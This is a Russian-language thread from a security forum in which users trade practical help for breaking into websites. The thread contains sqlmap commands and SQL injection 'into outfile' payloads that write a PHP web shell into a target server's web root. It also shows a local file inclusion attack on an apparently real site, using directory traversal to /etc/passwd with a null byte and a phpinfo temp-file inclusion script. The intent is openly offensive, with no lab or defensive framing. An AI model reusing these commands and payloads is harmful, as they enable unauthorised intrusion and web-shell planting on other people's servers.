ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Файлы читаются. Файл с ошибкой читается.

--file-write="C:\путь\тут php файл "

Что за путь здесь нужно указывать?

--file-dest="путь" здесь я так понял путь к файлам сайта

Ручками залей уже

vuln=1 limit 1 into outfile '/PathToShell/filename.php' lines terminated by ""--+

или

vuln=1 limit 1 into outfile ''/PathToShell/filename.php' fields terminated by '' optionally enclosed by ""--+​

2 Sat-hacker

вобщемта тут и понимать нечего -hh опция все покажет.

--file-write=WFILE Write a local file on the back-end DBMS file system

--file-dest=DFILE Back-end DBMS absolute filepath to write to

решил попробовать заюзать lfi найденный не так давно на неком сайте

оказалось что картинки подгрузить нельзя а другими путями я ниразу не ходил

есть доступ к phpinfo и php.ini

подскажите хороший мануал =(

Классика https://rdot.org/forum/showthread.ph...hlight=phpinfo

заюзал скрипт и при инклуде у меня пустая страничка

perl lfi.pl httр//site.com/i.php httр://www.site.com/index.php?page=../../../../../../../../../../../../../../etc/passwd%00

как только скрипт выполняется я копирую имя файла tmp/******

и инклужу

http://www.site.com/index.php?page=../../../../../../../../../../../../../../tmp/******%00

что может быть не так?? в скрипте ничего менять не надо??

Я это читал но не могу вкурить,обьясните если можна

В sqlmap --file-write="C:\shell.php" sqlmap берет шелл куда ты его положил на своем жд, --file-dest="/var/www/html/site.com" это куда sqlmap будет копировать файл шелла на сервере, при условии что есть права на запись файла.

К примеру так.

python sqlmap.py -u "http://dcsdcsdcds.com/index.php?id=12

--random-agent --file-write="C:\sqlmap\shell.php" --file-dest="var/www/html/dcsdcsdcds.com/images/"

товарищи, кто нибудь использует сокращение команд? -z. Удобно же.